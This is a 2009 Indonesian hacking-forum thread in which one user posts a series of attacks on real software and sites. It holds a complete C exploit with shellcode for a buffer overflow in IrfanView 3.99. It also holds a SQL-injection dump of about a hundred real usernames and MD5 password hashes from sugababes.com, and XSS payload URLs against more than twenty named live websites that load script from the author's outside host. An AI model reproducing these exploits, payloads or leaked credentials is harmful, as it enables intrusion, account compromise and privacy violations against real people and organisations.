Kumpulan Bugs

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Wed Jul 22, 2009 3:19 pm

Irfan View 3.99 >> Local Stack Buffer Overflow

shellcode : metasploit

Code: Select all

#include <stdio.h>
#include <stdlib.h>

#define SF "RO.iff"
#define OFFSET 2100

 char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";

char iff1[]=
"\x46\x4F\x52\x4D\x00\x01\x0B\x7E\x49\x4C\x42\x4D\x42\x4D\x48\x44"
"\x00\x00\x00\x14\x01\xFD\x01\xB6\x00\x00\x00\x00\x08\x00\x01\x00"
"\x00\x00\xC7\xC7\x01\xFD\x01\xB6\x43\x4D\x41\x50\x00\x00\x0C\x00"
"\x1B\x1B\x19\xFF\xFF\xFF\xBC\xD7\xEA\xEF\x64\x2E\x73\xA9\xD2\xD9"
"\xD9\xD9\x13\x6E\xB6\x00\x68\xB4\x70\x70\x70\xF0\x92\x6C\x2E\xCC"
"\xCC\xFA\xF2\xE6\x99\x99\x99\x50\x94\xC5\xF1\xE9\xE6\xF7\xAD\x32"
"\xAC\xB4\xB4\x4D\x4B\x48\xF0\xC9\xB4\xAB\x85\x38\xE0\xE9\xEF\xEC"
"\xE5\xDE\xEF\xB4\x98\x2E\x80\xBC\xE5\x98\x3A\x8C\x8C\x8C\xEF\xE0"
"\xD3\xA6\xC4\xD9\x33\x33\x33\x8C\xB6\xD5\xC6\xD5\xDD\xFA\xF7\xF3"
"\xFE\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x03\xFB\xEF\x3F\x78"
"\xE8\xFF\x00\xF8\xDF\x00\x03\x04\x10\x40\x41\xE7\x00\xEB\x00\x00"
"\xC0\xF4\x00\x01\x41\x56\xE7\x00\xDF\x00\x03\x04\x30\x40\xC7\xE7"
"\x00\xEA\x00\x00\x18\xF7\x00\x03\x03\xE0\x80\x5E\xE7\x00\xC1\x00"
"\xC1\x00\xC1\x00\xEB\xFF\x01\x7F\xE7\xF7\xFF\x03\xFC\xA7\x7E\x72"
"\xE8\xFF\x00\xF8\xDD\x00\x01\x01\x64\xE7\x00\xDF\x00\x00\x01\xFF"
"\x00\x01\x60\x80\xE8\x00\xEB\x00\x00\x80\xF6\x00\x03\x05\xC8\x81"
"\x6E\xE7\x00\xEB\x00\x01\x40\x10\xF7\x00\x03\x04\xA0\x40\x72\xE7"
"\x00\xC1\x00\xC1\x00\xC1\x00\xEB\xFF\x01\x3F\x87\xFF\xFF\x00\xDD"
"\xFC\xFF\x05\xEF\xF7\xFF\xE7\x9E\x66\xE8\xFF\x00\xF8\xEA\x00\x04"
"\x60\x00\xA0\x22\x01\xFE\x00\x07\x20\x50\x08\x00\x10\x01\x09\x80"
"\xE8\x00\xEC\x00\x05\x01\x20\x69\x80\xE0\x63\xFF\x03\x04\x01\x80"
"\x60\x70\x18\xFE\x00\x01\xA8\x80\xE8\x00\xEA\x00\x04\x68\x00\xA0"
"\x22\x01\xFE\x00\x07\x20\x50\x08\x04\x14\xA1\x89\x80\xE8\x00\xEC"
"\x00\x05\x01\x00\x18\x80\xA0\x40\xFF\x01\x09\x00\x80\x20\x40\x00"
"\x06\x04\x80\xA0\x80\xE8\x00\xC1\x00\xC1\x00\xC1\x00\xEC\xFF\x10"
"\xFE\x3F\x81\x7E\x4D\x97\x38\x73\xB9\xFA\x4F\x2F\xD3\xFF\xF1\x0E"
"\x67\xE8\xFF\x00\xF8\xEA\x00\x00\x04\xFF\x02\x00\x08\xFF\x00\x08"
"\x40\x00\x01\x00\x02\x00\x0A\x01\x60\xE7\x00\xEB\x00\x0F\x02\x4A"
"\xA2\xA0\x48\xC3\x04\x02\x20\xA1\x54\x2A\x00\x02\x20\xF0\xE7\x00"
"\xEC\x00\x10\x01\xC0\xCE\x83\xB2\xC8\xC7\x0C\x42\x00\xA1\xD0\x6E"
"\x04\x0A\xF1\xF8\xE7\x00\xEB\x00\x05\x23\xFB\xC2\xE1\xE7\x83\xFF"
"\x87\x07\xC7\xF1\x78\x7A\x06\x00\x20\xF0\xE7\x00\xC1\x00\xC1\x41";

 char iff2[]=
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x48";

 char iff3[]=
 "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41";

 int main()
{
	FILE* k;
	char *buffer;
	int offset=0;
	unsigned int retaddress=0x7C8369F0;
    buffer=(char *)malloc(OFFSET+sizeof(iff2)+sizeof(iff2)+sizeof(iff3))+4+1;
    
     if((k=fopen(SF,"wb"))==NULL)
   { printf("error"); exit(0); } 

	memcpy(buffer,iff1,sizeof(iff1));
	offset=sizeof(iff1);
	memcpy(buffer+offset,iff2,sizeof(iff2)); 		
    offset+=sizeof(iff2);
	memcpy(buffer+offset,iff3,sizeof(iff3));
	offset+=sizeof(iff3);
	offset=0;
	offset=OFFSET;
	memcpy(buffer+offset,&retaddress,4);
	offset+=4;
	memcpy(buffer+offset,shellcode,sizeof(shellcode));
	fwrite( buffer, 1,sizeof(iff2)+sizeof(iff2)+sizeof(iff3)+1, k );
   fclose(k);
	return 0;	
}
Terima Kasih….

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Thu Jul 23, 2009 4:04 pm

Bugs : sugababes.com

web Site / Link : http://sugababes.com/show-detail.php?id=27

Detail :

Code: Select all

Server = Apache/2.2.0 (Fedora)
    Version = 4.1.12
    Powered by = PHP/5.1.2
    Current User = sugababes@vv44web01
    Current Database = sugababes
    Supports Union = yes
    Union Columns = 8
Table : phpbb_users

Code: Select all

    phpbb_users
    diary
    news
Kolom : Table phpbb_users

Code: Select all

    username
    user_email
    user_icq
    user_id
    user_level
    user_password
Table : phpbb_users
username:user_password:

Code: Select all

mrs t:2d3a3249cdc7b4663db44d4ca8252d75:
Dannie Boy:182a1e726ac1c8ae851194cea6df0393:
Blazin Babe:4914964d52599ee3e77d68d578572c37:
orli:ffb4a4d0940fde9b0d2d7e9ea0017140:
Gunnar is goood:854694dc83b7fc6650f62fdbff1a52e6:
MissMisr:25d55ad283aa400af464c76d713c07ad:
ange2003:f9e1f3ae15198f819fbc3449479401bf:
Saltybabe:2507490e53b252c2f593ee4e9da9129e:
Leon_da_sexgod:f30532000a806003ddd6aa7771223b03:
KiraKatz:95884b5232ea01d055768613fc84f242:
tarynma:08017f86d47d1b641716b14e4c48ff35:
pinkky_1:d5df69da529ce3b838a5e0e0780a086e:
sugababe91:7fde47bf866ce9a846dc6d3ba7383049:
James Dean:8e3df1a989428ff469c83a35884bd4a1:
Regan:c0f800d7ffe20d4e44225275e68fda56:
qwertqwert:a384b6463fc216a5f8ecb6670f86456a:
beep:5f4dcc3b5aa765d61d8327deb882cf99:
butcher:c58498c44c94dcdaab1d75b1f4688707:
giomla:e2818f83e17dc0d8cba0bc156a8fb3ea:
Peter_p:e7efda40b1c94805070cd9bf9638ae27:
=: Roy :=:84e6c0471bc15c3a3a03153c6d28d047:
joker666:1b1c2ebe17e9f81469f267672e60933f:
Jack Daniel:0911054d8ad47cc256400031197f3e97:
minisimsam:f01e0d7992a3b7748538d02291b0beae:
SHREK:1a909a26169c230d006cb464fbbb35a3:
Millie:c51e7a23a59ef8d76892f207b517eaf0:
rich345:e7f4f8bd246c235418280d1f124e14f0:
Powerpuff_girl1:babc2860c134a097abd7b53f2a2a4193:
Miss Naughty:5d41402abc4b2a76b9719d911017c592:
jdauris:098796e75f06a07b6562d28805973870:
rem:5cadb523cb6909f92350f70f124adfb8:
Goro FL:00bfc8c729f5d4d529a412b12c58ddd2:
egla:7563df3e9a39d05bf34f33ca66c0e7b3:
keisha2003:29ddc288099264c17b07baf44d3f0adc:
Jckie:3d1e3077753f8fb768794c6a8331c493:
sexy-angel:d73686beae2b4fc74f8769280c94b46b:
threeb:32f6ede63b1ebcf1a9cb25edf5124e9c:
Steph 2003:57c7c2ddc26eb099d164044b1517c365:
nabel:d98c2a265e34013a60c84e8fb30f22ca:
js003e5537-4:47bc17dc1a2f164967f55325d866c75c:
jpaterson:3c268f9e57f72a904c02b735f357b761:
husky13:67afc88feaaa65c73fce9f79669a2127:
moehrle:3f42d55a1cccf1d96eb5a8e4c14ce4e4:
baby_blue:153a4b0a56d423c73a3c5c6f30a5e24e:
lori_1:3a9fa4655e6acd4ad1da3a5bc23f09a5:
dellihc:5e0fb1614a5f8e9ee42ba106302bb045:
sugarandspice5:aa6e1bacb3bedfec8b52420c1a8a6f51:
jdl87:08eccfc22ca5791286ebb537e0f15b8c:
katforsythe:275639052a9aa011ec2b3eba62c9aba3:
hannahgosney:198a8c20a31ae4fb9271efe60075609a:
JENNA  ANNABLE:6db38c85b66a565321f93357ff04fbdf:
harpreet:81a7b0619dde6aa8963033d7e34f3afb:
sugaboi:757550ecd97318ce9a1867bb96d026e5:
Summersmum:d39e7f80a9e4b67eebf53ca8410ee3ff:
dollars:ed7a163e90e0a798e145c8300cb582b8:
Derek L.Newman:439fd05bb7ff01f7673b2b073a1a4c4b:
guyperry:1174889cb6243d80d886eed8b8100a7c:
head_like:2a826adaf6e46ec11bab6f85f9402c53:
hazie:6de25a89f67a276da5f911ed789d0290:
clickrick:96468a0a3afaa8df9f9ac31cb94dbded:
gatouss:4a158576ff6319c86298de8203a7d159:
rxy230189:5eefc3c511dfcdf141d56678074b87a9:
lis:dc5a4e9caf9a70b6fe736090eb2016d8:
dimian:74cc8956e5a3ce87100f2f58e1396feb:
sjynstree:9103fb99bafb48705b35aabf0ceb1636:
RachHeidi:ad2106f2e4b616a289079eeb6a275d23:
bastardo:436dc8ee5312315758115fff0bc3a341:
sk8er_girl:d7428a7f7fbc8abb1df0d32507cc1565:
broxi:1174889cb6243d80d886eed8b8100a7c:
Jeshua:ce0e0023456351a42753a8094d7e5f0f:
adam lee:f8b13e38e26fc267b26f0c903b3f9f23:
suga_ellen:15cfacecb094e41225286428a49de010:
goovenon:bdf76bdd545feac99d636d011b81dc1d:
BrideMC:e1c565c5b1da2a3b81712427d06f5b34:
timducky:1e4ba061f03738f6350ce94051619d6c:
Littledevil_02:73ebfd0f8a23f0348989b520f2f41caa:
sweden_babe:21f9f292ef3f52e4d6aac3497ca1bb1d:
SassieSugababe:9d6f0e7faa62a99f5e5d4ea6e9d73666:
Burner2106:6b600db7ebc902f84a89ba680117975c:
nanamew:b9bf9b80051834fc8f6e9c20247cc282:
jopaton:613fbbc60d27e1aada1422d0ef3b27a2:
Molly Jean:a0bb756fef4053e66efd7a0629f562c7:
pasjekoel:ac0a8261e48b485b1a5ac98066ba2578:
bruttan:05b972dcf28374406d13e879724bfe3b:
Napp:301d43950a0f573f236a39038be71fe6:
bartkenter:fe86b268f412e57f83fcfd2b5561eac1:
Hugh:71fb1571844dff3db77ec2d950288b1b:
missismusic:fabb1d474de552e8301d8f5f7e637ef8:
dale:5f3c73f334928ade199125381f726892:
Kriz:b5f87a623929fd3b5ac265c888f1a215:
leezy87:8bc5b3285e2ac74b93c3ea6d7b0511d9:
reyon:757550ecd97318ce9a1867bb96d026e5:
Lobbie:9c10669263dac342426c90e0d711ef66:
edel:1038def6221874fb7208dff6349c21ef:
loopylass123:3fcf9ae132977f7ad2d4c9c58abffad0:
lees_babe:6988ec3aba1eaddf2435141bf10487ca:
Doll:73ebfd0f8a23f0348989b520f2f41caa:
MissBurnzzz:2b1b3eb12b8be71ecf1c42366a6c84da:
eb001d0067:e68b2892860a18086483cc1e4d0089e9:
kacklea:f78f2477e949bee2d12a2c540fb6084f:
Terima Kasih...

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Thu Jul 23, 2009 4:42 pm

Bugs : Yahoo Mexico Image

Image

>> Lihat Lebih Jelas <<

Lihat Web Site :

[url=htpp://%20http://mx.autos.yahoo.com/]>> Klik untuk melihat Web Site Victim <<[/url]

Bugs terdapat pada link di yahoo

Kode :

Code: Select all

http://mx.autos.yahoo.com/newcars/index.php?
Tampilannya :

Image

>> Lihat Lebih Jelas <<

Lihat Tampilan Bugs : >> Klik untuk melihat tampilannya <<

Terima Kasih...

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Thu Jul 23, 2009 5:46 pm

Image

Bugs : www.re.camcom.it Camera di Commercio Reggio Emilia

Link : RicercaView.jsp

Image

>> Klik untuk lihat lebih jelas <<

Tampilan Bugs :

Image

>> Klik untuk lihat lebih jelas <<

Lihat Tampilannya :

>> Klik Lihat Tampilannya <<

Terima Kasih...

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Thu Jul 23, 2009 6:36 pm

Bugs : latest.php

Tampilan :

Web Site : www.scodz.com

Link : /dstats/twatch/latest.php

Image

>> Klik untuk lihat gambar lebih jelas <<

Lihat Tampilan Web Site Bugs :

>> Klik untuk melihat Web Site Bugs <<

Selain link diatas terdapat juga pada link di bawah ini :

Code: Select all

www.scodz.com/dstats/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.rakosszentmihaly.hu/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.araburban.net/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.pragmatick.de/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.ealmahd.gov.sa/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

bulwindoors.com/~bulwindo/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.brandongevallen.nl/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.plan.sk/www-plan-stats/TraceWatch/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

path3.ca/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

park.zc.bz/02/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.strzelecki.org/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.judohk.cz/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

micromin.net/test/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.fantasyservice.com.ar/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.fjear.nl/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.eisenbahnen.at/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.chiroinzet.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.ggmc.org/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.willemsena.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.willemsenzwembaden.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.andrewillemsen.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

walden3.kr/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>
Terima Kasih...

Image

Image

Image

Image

User avatar
JokerKliker
Posts: 33
Joined: Sat Jan 10, 2009 6:00 pm
Location: Gotham City
Contact:

Re: Kumpulan Bugs

Post by JokerKliker » Fri Jul 24, 2009 4:41 pm

Waduh, sangar-sangar banget nih...
~~~

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 5:14 pm

JokerKliker wrote:Waduh, sangar-sangar banget nih...
gak juga sih..

menurut saya biasa aja..

para master disini lebih hebat ..

saya hanya mencari kelemahan yang mungkin bisa dilakukan itu saja..

Terima Kasih.......

Image

Image

Image

Image

User avatar
Digital Cat
